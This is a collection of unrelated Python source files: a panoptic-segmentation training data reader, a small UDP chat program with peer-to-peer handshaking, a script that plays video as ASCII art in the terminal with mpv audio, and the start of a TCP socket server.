def GetConnectedSegment(self, Seg):
[NumCCmp, CCmpMask, CCompBB, CCmpCntr] = cv2.connectedComponentsWithStats(Seg.astype(np.uint8)) # apply connected component
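        # cv2.connectedComponentsWithStats returns (num_labels, label_map, stats, centroids); each stats
        # row is [x, y, width, height, area], and label 0 is the background, so the loop below starts at 1.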
Mask=np.zeros([NumCCmp,Seg.shape[0],Seg.shape[1]],dtype=bool)
BBox=np.zeros([NumCCmp,4])
Sz=np.zeros([NumCCmp],np.uint32)
for i in range(1,NumCCmp):
Mask[i-1] = (CCmpMask == i)
BBox[i-1] = CCompBB[i][:4]
Sz[i-1] = CCompBB[i][4] #segment Size
return Mask,BBox,Sz,NumCCmp-1
#################################################################################################################################################
# Pick and return random segment from the list and remove it from the segment list
def PickRandomSegment(self,Sgs,SumAreas):
if self.PickBySize: # Pick random segment with probability proportional to size
r = np.random.randint(SumAreas) + 1
TotAreas=0
for ind in range(Sgs.__len__()):
TotAreas+=Sgs[ind]['Area']
if TotAreas>=r:
break
else: ind=np.random.randint(len(Sgs)) #Pick Random segment with equal probability
# print("ind" + str(ind))
SelectedSg=Sgs.pop(ind)
SumAreas-=SelectedSg["Area"]
return SelectedSg,SumAreas
##########################################################################################################################
    # Pick a set of segments from the list and generate a random ROI map by taking the inverse of the region defined by these segments' area
def GenerateRandomROIMask(self, Sgs, SumAreas):
ROI = np.ones(Sgs[0]["Mask"].shape)
if SumAreas<=0 and np.random.randint(6)==0: return ROI
r = np.random.randint(SumAreas) + 1
while (SumAreas>r):
SumAreasOld=SumAreas
SelectedSg, SumAreas=self.PickRandomSegment( Sgs, SumAreas)
# misc.imshow(SelectedSg["Mask"].astype(float))
if SumAreas>r:
ROI[SelectedSg["Mask"]]=0
# misc.imshow(ROI.astype(float))
else:
if np.random.randint(SumAreas,SumAreasOld)>r:# and (SumAreas>1000):
ROI[SelectedSg["Mask"]] = 0
else:
Sgs.append(SelectedSg)
return(ROI)
#############################################################################################################################
############################################################################################################################
#Pick random point from segment given as a binary mask
def PickRandomPointInSegment(self,Seg,ErodeMask=10):
x0 = int(np.floor(Seg["BBox"][0])) # Bounding box x position
Wbox = int(np.floor(Seg["BBox"][2])) # Bounding box width
y0 = int(np.floor(Seg["BBox"][1])) # Bounding box y position
Hbox = int(np.floor(Seg["BBox"][3])) # Bounding box height
if ErodeMask:
Msk = cv2.erode(Seg["Mask"].astype(np.uint8), np.ones((3, 3), np.uint8), iterations=ErodeMask)
if Msk.sum()==0: Msk=Seg["Mask"]
else:
Msk = Seg["Mask"]
while(True):
x = np.random.randint(Wbox) + x0
y = np.random.randint(Hbox) + y0
if (Msk[y,x])==1:
return x,y
##############################################################################################################################
    # Display loaded data on screen (for debugging)
def DisplayTrainExample(self,Img2,ROI2,Segment2,SelectedPoint2):
Img=Img2.copy()
ROI=ROI2.copy()
Segment=Segment2.copy()
SelectedPoint=SelectedPoint2.copy()
misc.imshow(Img)
SelectedPoint = cv2.dilate(SelectedPoint.astype(np.uint8), np.ones((3, 3), np.uint8), iterations=1)
Img[:, :, 0] = SelectedPoint.astype(np.uint8)*255+ (1-SelectedPoint.astype(np.uint8))*Img[:, :, 0]
Img[:, :, 1] *= 1-SelectedPoint.astype(np.uint8)
Img[:, :, 2] *= 1-SelectedPoint.astype(np.uint8)
Img[ :, :, 0] *= 1-(ROI.astype(np.uint8)-Segment.astype(np.uint8))
#Img[:, :, 1] += ROI.astype(np.uint8)*40
Img[ :, :, 2] *= 1 - Segment.astype(np.uint8)
# misc.imshow(Img)
#print(ROI.mean())
ROI[0,0]=0
misc.imshow(ROI.astype(float))
misc.imshow( Segment.astype(float))
misc.imshow(SelectedPoint.astype(float))
misc.imshow(Img)
#############################################################################################################################
    # Crop and resize image, mask and ROI to fit the batch size
def CropResize(self,Img, Mask,bbox,ROImask,Px,Py,Hb,Wb):
        # ========================resize image if it is too small for the batch size==================================================================================
[h, w, d] = Img.shape
Rs = np.max((Hb / h, Wb / w))
Wbox = int(np.floor(bbox[2])) # Segment Bounding box width
Hbox = int(np.floor(bbox[3])) # Segment Bounding box height
Bs = np.min((Hb / Hbox, Wb / Wbox))
        if Rs > 1 or Bs<1 or np.random.rand()<0.3: # Resize image and mask to batch size if the image is smaller than the batch or the segment bounding box is larger than the batch image size
h = int(np.max((h * Rs, Hb)))
w = int(np.max((w * Rs, Wb)))
Img = cv2.resize(Img, dsize=(w, h), interpolation=cv2.INTER_LINEAR)
Mask = cv2.resize(Mask.astype(float), dsize=(w, h), interpolation=cv2.INTER_NEAREST)
ROImask = cv2.resize(ROImask.astype(float), dsize=(w, h), interpolation=cv2.INTER_NEAREST)
            bbox = (np.float32(bbox) * Rs.astype(np.float64)).astype(np.int64)
Px = int(float(Px) * Rs)
Py = int(float(Py) * Rs)
if Px>=w:
Px=w-1
if Py>=h:
Py=h-1
# =======================Crop image to fit batch size===================================================================================
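        # Pick a random crop window of size (Wb, Hb) that stays inside the image and, when possible,
        # still contains both the segment bounding box and the selected point (Px, Py).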
x1 = int(np.floor(bbox[0])) # Bounding box x position
Wbox = int(np.floor(bbox[2])) # Bounding box width
y1 = int(np.floor(bbox[1])) # Bounding box y position
Hbox = int(np.floor(bbox[3])) # Bounding box height
if Wb > Wbox:
Xmax = np.min((w - Wb, x1))
Xmin = np.max((0, x1 - (Wb - Wbox)-1))
else:
Xmin = x1
Xmax = np.min((w - Wb, x1 + (Wbox - Wb)+1))
if Hb > Hbox:
Ymax = np.min((h - Hb, y1))
Ymin = np.max((0, y1 - (Hb - Hbox)-1))
else:
Ymin = y1
Ymax = np.min((h - Hb, y1 + (Hbox - Hb)+1))
if Ymax<=Ymin: y0=Ymin
else:
while(True):
y0 = np.random.randint(low=Ymin, high=Ymax + 1)
if (y0 <= Py) and Py < (y0 + Hb): break
if Xmax<=Xmin: x0=Xmin
else:
while (True):
x0 = np.random.randint(low=Xmin, high=Xmax + 1)
if (x0 <= Px) and Px < (x0 + Wb): break
# Img[:,:,1]*=Mask
# misc.imshow(Img)
Px-=x0
Py-=y0
Img = Img[y0:y0 + Hb, x0:x0 + Wb, :]
Mask = Mask[y0:y0 + Hb, x0:x0 + Wb]
ROImask = ROImask[y0:y0 + Hb, x0:x0 + Wb]
#------------------------------------------Verify shape match the batch shape----------------------------------------------------------------------------------------
if not (Img.shape[0] == Hb and Img.shape[1] == Wb): Img = cv2.resize(Img, dsize=(Wb, Hb),interpolation=cv2.INTER_LINEAR)
if not (Mask.shape[0] == Hb and Mask.shape[1] == Wb):Mask = cv2.resize(Mask.astype(float), dsize=(Wb, Hb), interpolation=cv2.INTER_NEAREST)
if not (ROImask.shape[0] == Hb and ROImask.shape[1] == Wb): ROImask = cv2.resize(ROImask.astype(float), dsize=(Wb, Hb), interpolation=cv2.INTER_NEAREST)
#-----------------------------------------------------------------------------------------------------------------------------------
return Img,Mask,ROImask,Px,Py
# misc.imshow(Img)
######################################################################################################
#Generate list of all segments in the image
    # Given the annotation map and the json data file, create a list of all segments and instances with info on each segment
#--------------------------Generate list of all segments--------------------------------------------------------------------------------
def GeneratListOfAllSegments(self,Ann,Ann_name,AddUnLabeled=False,IgnoreSmallSeg=True):
AnnList = self.GetAnnnotationData(Ann_name)
Sgs = [] # List of segments and their info
SumAreas=0 # Sum areas of all segments up to image
for an in AnnList:
an["name"], an["isthing"] = self.GetCategoryData(an["category_id"])
if (an["iscrowd"] and self.IgnoreCrowds) or (not an["isthing"] and not self.ReadStuff):
Ann[Ann == an['id']] = self.UnlabeledTag
continue
if (an["isthing"] and self.SplitThings) or (an["isthing"]==False and self.SplitStuff) or (an["iscrowd"] and self.SplitCrowd): #Things are objects that have instances
TMask, TBBox, TSz, TNm = self.GetConnectedSegment(Ann == an['id']) # Split to connected components
for i in range(TNm):
seg={}
seg["Mask"]=TMask[i]
seg["BBox"]=TBBox[i]
seg["Area"]=TSz[i]
if (not an["isthing"]): seg["Area"]*=self.StuffAreaFactor
if seg["Area"] < self.MinSegSize and IgnoreSmallSeg:
Ann[Ann == an['id']] = self.UnlabeledTag
continue
seg["NumParts"] =TNm
seg["IsSplit"]=TNm>1
seg["IsThing"]=an["isthing"]
seg["Name"]=an["name"]
seg["IsCrowd"]=an["iscrowd"]
seg["CatId"]=an["category_id"]
seg["IsLabeled"] = True
SumAreas+=seg["Area"]
Sgs.append(seg)
else: # none object classes such as sky
seg = {}
seg["Mask"] = (Ann == an['id'])
seg["BBox"] = an["bbox"]
seg["Area"] = an["area"]
if (not an["isthing"]): seg["Area"] *= self.StuffAreaFactor
if seg["Area"] < self.MinSegSize and IgnoreSmallSeg: # Ignore very small segments
Ann[Ann == an['id']] = self.UnlabeledTag
continue
seg["NumParts"] = 1
seg["IsSplit"] = False
seg["IsThing"] = an["isthing"]
seg["Name"] = an["name"]
seg["IsCrowd"] = an["iscrowd"]
seg["CatId"] = an["category_id"]
seg["IsLabeled"]=True
SumAreas += seg["Area"]
Sgs.append(seg)
if AddUnLabeled: #Add unlabeled region as additional segments
TMask, TBBox, TSz, TNm = self.GetConnectedSegment(Ann == self.UnlabeledTag) # Split to connected components
for i in range(TNm):
seg = {}
seg["Mask"] = TMask[i]
seg["BBox"] = TBBox[i]
seg["Area"] = TSz[i]
seg["NumParts"] = TNm
seg["Name"] ="unlabeled"
seg["CatId"] = self.UnlabeledTag
seg["IsLabeled"] = False
Sgs.append(seg)
return Sgs,SumAreas
##################################################################################################################################################
def LoadNextGivenROI(self,NewImg=True):
        # This function is used serially on the same image for cascade full-image segmentation
        # Pick a random point on a given ROI mask
        # and return the point, the ROI mask and the image
#-------------If new image load the next image and annotation data--------------------------------------------------
if NewImg:
Img_name=self.FileList[self.itr].replace(self.AnnotationFileType,self.ImageFileType)
Ann_name=self.FileList[self.itr] # Get label image name
# print(Ann_name)
# print(Img_name)
# print(Ann_name)
Img = cv2.imread(self.ImageDir + "/" + Img_name) # Load Image
Img = Img[...,:: -1]
if (Img.ndim == 2): # If grayscale turn to rgb
Img = np.expand_dims(Img, 3)
Img = np.concatenate([Img, Img, Img], axis=2)
Img = Img[:, :, 0:3] # Get first 3 channels incase there are more
Ann = cv2.imread(self.AnnotationDir + "/" + Ann_name) # Load Annotation
Ann = Ann[..., :: -1]
self.AnnColor=Ann
Ann=rgb2id(Ann)
# misc.imshow((Ann==0).astype(float))
# misc.imshow(Img)
H,W=Ann.shape
ROIMap=np.ones([H,W]) # Generate ROI mask that cover the full image
# AnnList = self.GetAnnnotationData(Ann_name)
Sgs, SumAreas = self.GeneratListOfAllSegments(Ann, Ann_name,AddUnLabeled=True,IgnoreSmallSeg=False)
self.Sgs=Sgs
self.BImgs = np.expand_dims(Img, axis=0).astype(np.float32)
# self.BAnnList = AnnList
self.BROIMask = np.expand_dims(ROIMap, axis=0).astype(np.float32)
self.BAnn = Ann.astype(np.float32)
#-----------------Load
else:
# Img = self.BImgs[0]
# AnnList = self.BAnnList
ROIMap = self.BROIMask[0]
Ann = self.BAnn
H, W = Ann.shape
# self.BCat = np.zeros((BatchSize
while (True):
x = np.random.randint(W)
y = np.random.randint(H)
if (ROIMap[y, x]) == 1: break
PointerMask=np.zeros(Ann.shape,dtype=float)
PointerMask[y,x]=1
PointerMask=np.expand_dims(PointerMask, axis=0).astype(float)
return PointerMask, self.BImgs ,self.BROIMask
#########################################################################################################################################
    # Given a predicted segment (SegMask) and the list of GT segments (self.Sgs),
    # find the GT segment with the highest IOU overlap with the predicted SegMask.
    # Used for the evaluation of the serial region-by-region full-image segmentation mode
def FindCorrespondingSegmentMaxIOU(self,SegMask):
MaxIOU=-1
TopSeg=0
for seg in self.Sgs:
IOU=(seg["Mask"] * SegMask).sum() / (seg["Mask"].sum() + SegMask.sum() - (seg["Mask"] * SegMask).sum())
if IOU>MaxIOU:
MaxIOU=IOU
TopSeg=seg
IOU = (TopSeg["Mask"] * SegMask).sum() / (TopSeg["Mask"].sum() + SegMask.sum() - (TopSeg["Mask"] * SegMask).sum())
Precision = (TopSeg["Mask"] * SegMask).sum() / SegMask.sum()
Recall = (TopSeg["Mask"] * SegMask).sum() / TopSeg["Mask"].sum()
if not TopSeg["IsLabeled"]: SegType = "Unlabeled"
elif TopSeg["IsCrowd"]:SegType = "crowd"
elif TopSeg["IsThing"]: SegType = "thing"
else: SegType = "stuff"
return IOU,Precision,Recall,SegType,TopSeg["Mask"].astype(float)
############################################################################################################################################################################################
    # Read a single training example:
    # pick 1) a random image 2) a random segment from the image 3) a random point on this segment 4) a random ROI for this segment
    # These are used for training
# ==========================Read image annotation and data===============================================================================================
def LoadNext(self, batch_pos, itr_pos, Hb=-1, Wb=-1):
Img_name=self.FileList[itr_pos].replace(self.AnnotationFileType,self.ImageFileType)
Ann_name=self.FileList[itr_pos] # Get label image name
Img = cv2.imread(self.ImageDir + "/" + Img_name) # Load Image
Img = Img[...,:: -1]
if (Img.ndim == 2): # If grayscale turn to rgb
Img = np.expand_dims(Img, 3)
Img = np.concatenate([Img, Img, Img], axis=2)
Img = Img[:, :, 0:3] # Get first 3 channels incase there are more
Ann = cv2.imread(self.AnnotationDir + "/" + Ann_name) # Load Annotation
Ann = Ann[..., :: -1]
Ann=rgb2id(Ann)
#--------------------------Generate list of all segments using annotation map--------------------------------------------------------------------------------
Sgs,SumAreas= self.GeneratListOfAllSegments(Ann, Ann_name)
#----------------------------------------------------------------------------------------------------------------------------------------
if Sgs.__len__()>0:
SelectedSg, SumAreas = self.PickRandomSegment(Sgs, SumAreas)
else:
print("No Segments to pick")
itr_pos=np.random.randint(len(self.FileList))
return self.LoadNext(batch_pos,itr_pos,Hb,Wb)
if Sgs.__len__()>0:
ROIMask = self.GenerateRandomROIMask(Sgs, SumAreas)
else:
ROIMask = np.ones(Ann.shape)
Px, Py = self.PickRandomPointInSegment( SelectedSg)
if not Hb==-1:
Img, SegMask, ROIMask, Px, Py=self.CropResize(Img, SelectedSg["Mask"], SelectedSg["BBox"], ROIMask, Px, Py, Hb, Wb)
# else:
# SegMask=SelectedSg["Mask"]
#---------------------------------------------------------------------------------------------------------------------------------
PointerMap = np.zeros(SegMask.shape)
PointerMap[Py, Px] = 1
self.BImgs[batch_pos] = Img
self.BSegmentMask[batch_pos] = SegMask
self.BROIMask[batch_pos] = ROIMask
self.BPointerMap[batch_pos] = PointerMap
self.BIsThing[batch_pos] = SelectedSg["IsThing"]
self.BCat[batch_pos] = SelectedSg["CatId"]
############################################################################################################################################################
    # Start loading a batch of images, segment masks, ROI masks, and pointer points for training (multithreaded)
def StartLoadBatch(self):
# =====================Initiate batch=============================================================================================
while True:
            Hb = np.random.randint(low=self.MinSize, high=self.MaxSize) # Batch height
            Wb = np.random.randint(low=self.MinSize, high=self.MaxSize) # Batch width
if Hb*Wb<self.MaxPixels: break
        BatchSize = int(np.min((np.floor(self.MaxPixels / (Hb * Wb)), self.MaxBatchSize)))
self.BImgs = np.zeros((BatchSize, Hb, Wb, 3)) #
self.BSegmentMask = np.zeros((BatchSize, Hb, Wb))
self.BROIMask = np.zeros((BatchSize, Hb, Wb)) #
self.BPointerMap = np.zeros((BatchSize, Hb, Wb))
self.BIsThing = np.zeros((BatchSize))
self.BCat= np.zeros((BatchSize))
#===============if epoch finished reshuffle file list and start new epoch====================================
if self.itr+BatchSize >= len(self.FileList):
if self.suffle: random.shuffle(self.FileList)
self.itr = 0
self.Epoch += 1
#====================Start reading data multithreaded===========================================================
self.thread_list = []
for pos in range(BatchSize):
th=threading.Thread(target=self.LoadNext,name="thread"+str(pos),args=(pos,self.itr+pos,Hb,Wb))
self.thread_list.append(th)
th.start()
self.itr+=BatchSize
###########################################################################################################
    # Wait until the data batch loading started by StartLoadBatch has finished
def WaitLoadBatch(self):
for th in self.thread_list:
th.join()
########################################################################################################################################################################################
def LoadBatch(self):
        # Load a batch for training (multi-threaded, runs in parallel with the training process)
# For training
self.WaitLoadBatch()
Imgs=self.BImgs
SegmentMask=self.BSegmentMask
ROIMask=self.BROIMask
PointerMap=self.BPointerMap
self.StartLoadBatch()
return Imgs, SegmentMask,ROIMask,PointerMap
########################################################################################################################################################################################
def LoadSingleClean(self):
        # Load a batch of one image, segment mask and pointer point without cropping or resizing
        # for the evaluation step
if self.itr >= len(self.FileList):
self.itr = 0
self.Epoch += 1
Hb, Wb, d = cv2.imread(self.AnnotationDir + "/" + self.FileList[self.itr]).shape
self.BImgs = np.zeros((1, Hb, Wb, 3)) #
self.BSegmentMask = np.zeros((1, Hb, Wb))
self.BROIMask = np.zeros((1, Hb, Wb)) #
self.BPointerMap = np.zeros((1, Hb, Wb))
self.BIsThing = np.zeros((1))
self.BCat = np.zeros((1))
self.LoadNext(0,self.itr, Hb,Wb)
self.itr += 1
Imgs = self.BImgs
SegmentMask = self.BSegmentMask
ROIMask = self.BROIMask
PointerMap = self.BPointerMap
IsThing = self.BIsThing[0]
return Imgs, SegmentMask, ROIMask, PointerMap,IsThing
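##################################################################################################################################################
# Illustrative sketch only (not part of the original reader): a minimal, hypothetical training loop
# showing how this Reader is meant to be driven; the directory and file paths are placeholders.
if __name__ == "__main__":
    reader = Reader(ImageDir="path/to/train2017",
                    AnnotationDir="path/to/panoptic_train2017",
                    DataFile="path/to/panoptic_train2017.json",
                    TrainingMode=True)  # TrainingMode=True already starts loading the first batch
    for step in range(10):
        # LoadBatch waits for the loader threads, returns the current batch and immediately
        # starts loading the next one in the background
        Imgs, SegmentMask, ROIMask, PointerMap = reader.LoadBatch()
        print(step, Imgs.shape, SegmentMask.shape, ROIMask.shape, PointerMap.shape)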
|
udpchat.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 25 19:34:11 2019
@author: mrich
"""
import argparse
import socket
import threading
import queue
import sys
import random
import os
import re
import string
import time
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def randomString(stringLength=10):
"""Generate a random string of fixed length """
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def checkForCommand(data):
# returns false on no command, or the command string on command
cmd_regex = r"]->!(.+)"
match = re.search(cmd_regex,data)
if match:
return match.group(1)
return False
"""
My peering strat
!trypeer - sent by a client to ask for peering
!gopeer|ip,port,nonce - Sent by server back to clients with ip and port they should start sending to
!peer|nonce - Sent by client to client until the corresponding peer is received, indicating link is up
"""
#Client Code
def ReceiveData(sock):
data = False
try:
data,addr = sock.recvfrom(1024)
data=data.decode('utf-8')
return data,addr
except:
return False,0
"""
client states:
0 = client - server
1 = waiting for peer
2 = in peer
"""
def monitorUserInput(q):
while True:
data = input()
q.put((data))
if data == 'qqq':
break
return
def RunClient():
clientState = 0
host = get_ip()
port = random.randint(6000,10000)
print('Client IP->'+str(host)+' Port->'+str(port))
server = (str(args.ip),args.port)
# peer place holder
peerIP = '127.0.0.1'
peerPort = 31337
nonce ='notset'
peer = (peerIP,peerPort)
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.setblocking(False)
s.bind((host,port))
name = args.handle
while name is None:
name = input('Please write your name here: ')
s.sendto(name.encode('utf-8'),server)
userInput = queue.Queue()
threading.Thread(target=monitorUserInput,args=(userInput,)).start()
print("'qqq' to exit")
while keepRunning:
#print('loop')
if not userInput.empty():
data = userInput.get()
#print("User input received {}".format(data))
if data == 'qqq':
break
elif data=='':
continue
data = '['+name+']' + '->'+ data
if clientState in [0,1]:
s.sendto(data.encode('utf-8'),server)
elif clientState == 2:
s.sendto(data.encode('utf-8'),peer)
data,addr = ReceiveData(s)
if data:
cmd = checkForCommand(data)
if cmd:
if clientState == 0:
# check for gopeer command
if (cmd.startswith("gopeer")):
# get the important part
peerIP, peerPort, nonce = cmd.split("|")[1].split(",")
                        # set the peer
peer = (peerIP, int(peerPort))
#set the state
clientState = 1
print("Go peer recvd: {}, {}, {}".format(peerIP, peerPort, nonce))
if clientState == 1:
if (cmd.startswith("peer")):
# get the sent nonce
print("peer recvd: {}".format(cmd))
sentnonce = cmd.split("|")[1]
if (nonce == sentnonce):
# We are peered!
print("[!] Peer to peer established!")
clientState = 2
else:
print("nonce mismatch? {} != {}".format(nonce, sentnonce))
if clientState == 2:
# placeholder
pass
#print("Command received: {}".format(cmd))
# end command check
else:
# just print the received message
print("[{}]: {}".format(addr,data))
else:
# No data was received, placeholder
pass
# Need to send the peer command if in correct state
if clientState == 1:
peercmd = '['+name+']->!peer|' + nonce
s.sendto(peercmd.encode('utf-8'),peer)
# little sleep to prevent crazy message spam
time.sleep(0.1)
s.close()
os._exit(1)
#Client Code Ends Here
#Server Code
def RecvData(sock,recvPackets):
while keepRunning:
data,addr = sock.recvfrom(1024)
recvPackets.put((data,addr))
def RunServer():
host = get_ip()
port = args.port
print('Server hosting on IP-> '+str(host))
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.bind((host,port))
clients = set()
recvPackets = queue.Queue()
print('Server Running...')
threading.Thread(target=RecvData,args=(s,recvPackets)).start()
while keepRunning:
while not recvPackets.empty():
data,addr = recvPackets.get()
if addr not in clients:
clients.add(addr)
#continue
#clients.add(addr)
data = data.decode('utf-8')
cmd = checkForCommand(data)
if cmd:
print("Command received: {}".format(cmd))
if cmd.startswith('trypeer'):
# go through the list of clients and send a gopeer message
# this is really only meant for single peer to peer testing
nonce = randomString(5)
for c1 in clients:
for c2 in clients:
if c1 != c2:
# format data in c2 and send as gopeer
msg = "[server]->!gopeer|{},{},{}".format(c2[0], c2[1], nonce)
print("sending {} to {}".format(msg,str(c1)))
s.sendto(msg.encode('utf-8'),c1)
# end if c1 != c2
# end for c2
# end for c1
# end command check
elif data.endswith('qqq'):
clients.remove(addr)
continue
else:
print(str(addr)+data)
for c in clients:
if c!=addr:
s.sendto(data.encode('utf-8'),c)
s.close()
#Server Code Ends Here
description = 'UDP Chat v0.1 Beta\n'
description += "Want to learn about UDP hole punching? Write it yourself.\n"
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("mode", type=str, help="Either server or client", choices=['server', 'client'])
parser.add_argument("--ip", type=str, help="Server IP, required in client mode")
parser.add_argument("--port", type=int, help="Server port. If specified in server mode, will establish server at given port", default=5000)
parser.add_argument("--handle", type=str, help="Your chosen chat handle. If not specified, will be requested")
# And GO!
args = parser.parse_args()
keepRunning = True
if (args.mode == 'client') and (args.ip is None):
parser.error("client mode requires the server ip, set with '--ip=x.x.x.x'")
if __name__ == '__main__':
try:
if args.mode=='server':
#print("would run server at port {}".format(args.port))
RunServer()
elif args.mode=='client':
#print("Would run client to server at {}:{} with handle: {}".format(args.ip, args.port, args.handle))
RunClient()
except Exception as badnews:
# basically exiting all threads on an exception
print("Exiting because of {}".format(badnews))
keepRunning = False
print("Stopped.")
os._exit(1)
|
video2chars.py
|
# -*- coding:utf-8 -*-
import numpy as np
import pickle
import os
import invoke
from threading import Thread
# Characters used as the "pixels" of the ASCII art; the later a character appears in the string, the more visually prominent it is meant to be. I ordered them by feel, so feel free to adjust. Defining this inside a function is too inefficient, so it lives at module level.
# pixels = " .,-'`:!1+*abcdefghijklmnopqrstuvwxyz<>()\/{}[]?234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ%&@#$"
# pixels = "$@B%8&WM#wmhkbdpqaozcvunxrt*+1!;:`'-,. "
# pixels = "@$&B8ao*?+=~-,. "
pixels = "$@%WMB#QOwmri*^+-;:'`,. "
def video2imgs(video_name, size, seconds):
"""
    :param video_name: string, the path of the video file
    :param size: a (width, height) tuple specifying the size of the generated ASCII art
    :param seconds: how many seconds to decode (from 0 to `seconds`)
    :return: a list of img objects; an img object is actually a numpy.ndarray
"""
    import cv2  # import opencv
    img_list = []
    # create a VideoCapture object from the given file
    cap = cv2.VideoCapture(video_name)
    # frame rate
    fps = cap.get(cv2.CAP_PROP_FPS)
    # number of frames to extract
    frames_count = fps * seconds
    count = 0
    # cap.isOpened(): returns true once the cap object has been initialised
    while cap.isOpened() and count < frames_count:
        # cap.read() return values:
        #   ret   indicates whether a frame was read
        #   frame is the image matrix, of type numpy.ndarray
        ret, frame = cap.read()
        if ret:
            # convert to grayscale; you could skip this step to produce a colour character video instead
            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
            # resize the image so that the resulting ASCII art fits completely in the terminal
            img = cv2.resize(gray, size, interpolation=cv2.INTER_AREA)
            # store the converted result frame by frame
            img_list.append(img)
            count += 1
        else:
            break
    # release resources when done
    cap.release()
return img_list, fps
def img2chars(img):
    """
    :param img: numpy.ndarray, image matrix
    :return: a list of strings: the ASCII art for the image, one string per row of pixels
    """
    res = []
    # note that the order here is exactly the reverse of the earlier `size` (width, height)
    height, width = img.shape
    for row in range(height):
        imgline = []
        line = ""
        for col in range(width):
            # gray levels are 8-bit values, so the maximum is 255;
            # map the gray level into the range 0-1
            percent = img[row][col] / 255
            imgline.append(img[row][col])
            # map it further into 0 .. (len(pixels) - 1) so it indexes a character in pixels
            index = int(percent * (len(pixels)-1))
            # if 200 <= img[row][col] <= 210:
            #     index = 13
            # append the character "pixel" plus a space (the terminal has line spacing but almost no
            # character spacing, so the space acts as horizontal spacing)
            line += pixels[index] + " "
        res.append(line)
        # print(imgline)
        # print("*"*100)
return res
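# Illustrative sketch only (not part of the original script): a tiny, hypothetical example of the
# grayscale-to-character mapping performed inside img2chars above.
def _char_mapping_example():
    img = np.array([[0, 128, 255]], dtype=np.uint8)  # a 1x3 "image": black, mid gray, white
    # 0   -> index 0                  -> pixels[0]  ('$')
    # 128 -> int(128/255 * 23) = 11   -> pixels[11] ('r')
    # 255 -> index len(pixels)-1 = 23 -> pixels[23] (a space)
    return img2chars(img)[0]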
def imgs2chars(imgs):
video_chars = []
for img in imgs:
video_chars.append(img2chars(img))
return video_chars
def play_video(video_chars, frames_rate):
"""
    Play the character video, curses version
    :param video_chars: list of ASCII-art frames, one element per frame
    :param frames_rate: frame rate
    :return: None
    """
    # import the modules we need; only this function uses these two, so import them here
    import time
    import curses
    # get the dimensions of the ASCII art
    width, height = len(video_chars[0][0]), len(video_chars[0])
    # initialise curses; this is required boilerplate
    stdscr = curses.initscr()
    curses.start_color()
    try:
        # resize the window; the width should preferably be slightly larger than the art width.
        # also note the (height, width) argument order used by curses
        stdscr.resize(height, width * 2)
        for pic_i in range(len(video_chars)):
            # display pic_i, i.e. the i-th ASCII-art frame
            for line_i in range(height):
                # write line line_i of pic_i starting at column 0; (line_i, 0) means start at the
                # beginning of row line_i; the last argument sets the character colour to white
                stdscr.addstr(line_i, 0, video_chars[pic_i][line_i], curses.COLOR_WHITE)
            stdscr.refresh() # refresh after writing so the screen updates immediately
            time.sleep(1 / frames_rate) # rough control of the playback speed
    finally:
        # curses must be initialised before use and must always be shut down afterwards, with or without an exception
        curses.endwin()
return
# def play_video(video_chars, frames_rate):
#     """
#     Play the character video, "clear" version
#     :param video_chars: list of ASCII-art frames, one element per frame
#     :param frames_rate: frame rate
#     :return: None
#     """
#     # import the modules we need; only this function uses these two, so import them here
#     import time
#     import subprocess
#     # get the dimensions of the ASCII art
#     width, height = len(video_chars[0][0]), len(video_chars[0])
#     for pic_i in range(len(video_chars)):
#         # display pic_i, i.e. the i-th ASCII-art frame
#         for line_i in range(height):
#             # print line line_i of pic_i
#             print(video_chars[pic_i][line_i])
#         time.sleep(1 / frames_rate)  # rough control of the playback speed
#         subprocess.call("clear")
def dump(obj, file_name):
"""
    Save the given object to a local file named file_name
"""
with open(file_name, 'wb') as f:
pickle.dump(obj, f)
return
def load(filename):
"""
    Load an object from the given file in the current folder
"""
with open(filename, 'rb') as f:
return pickle.load(f)
def get_file_name(file_path):
"""
    Extract the file name, without extension, from a file path
    """
    # get the file name from the file path
    path, file_name_with_extension = os.path.split(file_path)
    # take the file name prefix (drop the extension)
file_name, file_extension = os.path.splitext(file_name_with_extension)
return file_name
def has_file(path, file_name):
"""
    Check whether a file with the given name exists in the given directory
"""
return file_name in os.listdir(path)
def get_video_chars(video_path, size, seconds):
"""
    Return the character-video representation of the given video
    """
    video_dump = "output/" + get_file_name(video_path) + ".pickle"
    # if the cached video_dump already exists in the output folder, just load it
    if has_file("./output/", os.path.basename(video_dump)):
        print("Found a cached conversion for this video, loading it directly")
        video_chars, fps = load(video_dump)
    else:
        print("No cache found, starting character-video conversion")
        print("Reading the video frame by frame")
        # convert the video to character animation
        imgs, fps = video2imgs(video_path, size, seconds)
        print("All frames converted to images, converting each frame to ASCII art")
        video_chars = imgs2chars(imgs)
        print("Conversion finished, caching the result")
        # save [video_chars, fps] to disk
        dump([video_chars, fps], video_dump)
        print("Caching done")
return video_chars, fps
def play_audio(video_path):
def call():
        # use the invoke library to run the local command;
        # we don't use subprocess because it has no `hide` option: when calling mpv, even with the
        # output streams redirected, it would still interfere with the ASCII-art playback
        invoke.run(f"mpv --no-video {video_path}", hide=True, warn=True)
    # run the music-playing command in a child thread: invoke.run() blocks, so playing the
    # ASCII art and the audio at the same time requires multiple threads/processes
    p = Thread(target=call)
    p.daemon = True
p.start()
def main():
    # width, height
    size = (54, 96)
    # video path, replace with your own
    video_path = "video-1.mp4"
    seconds = 15  # only convert the first 15 seconds
    video_chars, fps = get_video_chars(video_path, size, seconds)
    # play the audio track
    play_audio(video_path)
    # play the video
play_video(video_chars, fps)
if __name__ == "__main__":
main()
|
socket_server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @File : socket_server.py
# @Time : 2019/2/28 23:19
# @Author : MaiXiaochai
# @Site : https://github.com/MaiXiaochai
import socket
import threading
# socket.AF_INET IPV4
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# the argument is an (address, port) tuple
server.bind(('0.0.0.0', 8000))
server.listen()
